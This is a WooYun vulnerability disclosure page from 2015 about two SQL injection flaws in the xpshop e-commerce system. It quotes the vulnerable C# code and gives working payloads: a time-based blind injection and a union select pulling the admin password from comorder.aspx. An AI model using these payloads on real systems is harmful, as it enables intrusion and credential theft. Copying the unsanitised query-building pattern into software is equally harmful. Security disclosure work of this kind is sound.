当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146945

漏洞标题:xpshop网店系统sql注入两处(一处盲注)

相关厂商:xpshop

漏洞作者: 不能忍

提交时间:2015-10-22 17:34

修复时间:2015-12-06 17:36

公开时间:2015-12-06 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

漏洞位置:**.**.**.**order

protected void Page_Load(object sender, EventArgs e)
{
if (base.CurrentUser != null && base.CurrentUser.Name != "anonymous")
{
this.member = base.CurrentUser;
this.shipfree = new ShippingFreeDB().GetShippingFreeDetails(1);
if (!base.IsPostBack)
{
if (base.Request.QueryString["type"] != null && base.Request.QueryString["Action"] != null)
{
string text = base.Request.QueryString["Action"];
if (text != null)
{
if (!(text == "GetSubArea"))
{
if (!(text == "GetAddrDetail"))
{
if (!(text == "GetZtds"))
{
if (!(text == "GetShipps"))
{
if (!(text == "GetShoppingCart"))
{
if (text == "GetAdvancePayment")
{
if (base.CurrentUser != null && base.CurrentUser.Name != "anonymous")
{
base.Response.Write(base.CurrentUser.AdvancePayment);
}
else
{
base.Response.Write("0");
}
}
}
else
{
ShoppingCartDB shoppingCartDB = new ShoppingCartDB();
SqlDataReader items = shoppingCartDB.GetItems(shoppingCartDB.GetShoppingCartId());
string s = XpShopJson.DrtToJSON(items, "Cart");
items.Close();
base.Response.Write(s);
}
}
else
{
this.GetShipps();
}
}
else
{
this.GetZtds();
}
}


还是这个函数this.GetZtds();:

private void GetZtds()
{
SqlDataReader ztds = new ZtdDB().GetZtds2(base.Request.QueryString["AreaID"]);
string s = XpShopJson.DrtToJSON(ztds, "Ztd");
base.Response.Write(s);
}


再跟进:

public SqlDataReader GetZtds2(string areaID)
{
string cmdText = string.Concat(new string[]
{
"SELECT * FROM Ztd WHERE ",
Utils.dbo,
"f_GetShippingAreaNo(AreaID) Like (Cast(",
Utils.dbo,
"f_GetShippingAreaNo(",
areaID,
") As nvarchar(30)) + '%') ORDER BY ZtdID"
});
return XpShopDB.ExecuteReader(XpShopDB.ConnectionString, CommandType.Text, cmdText, null);
}


好像不回显的。
没有过滤,直接进库给个payload:
/comorder.aspx?type=1&action=GetZtds&AreaID=1) as nvarchar));waitfor delay '0:0:3'--
第二处:

public int GetScore()
{
return (this.config.MarkUnit == 1) ? ((int)this.orderDB.GetComTotal(base.CurrentUser.MemberID, this.GetOrderIDs(), "Score")) : 0;
}


跟进函数GetComTotal:

public DataTable GetComOrderPresents(int memberID, string orderIDs, string productID)
{
string text = "select ProductID,GiftID,PresentName,sum(PresentNum)/count(GiftID) as PresentNum,Ptype,count(GiftID) as Sum from OrderPresent ";
object obj = text;
text = string.Concat(new object[]
{
obj,
" where ",
(productID != "0") ? ("ProductID = " + productID + " and ") : "",
" OrderID In (select OrderID from Orders where (Orders.Status = 0 or Orders.Status = 2 and PayType IN(5,6)) and MemberID = ",
memberID,
" and OrderID in (",
orderIDs,
")) "
});
text += "group by ProductID,GiftID,PresentName,Ptype";
return XpShopDB.ExecuteDataTable(XpShopDB.ConnectionString, CommandType.Text, text, null);
}


同样没过滤。
给个payload:
/comorder.aspx?OrderID=1)) union select password from admin--

漏洞证明:

http://localhost/comorder.aspx?type=1&action=GetZtds&AreaID=1) as nvarchar));waitfor delay '0:0:3'--

blind.jpg


第二处:
http://localhost/comorder.aspx?OrderID=1)) union select password from admin--

1.jpg

修复方案:

过滤

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价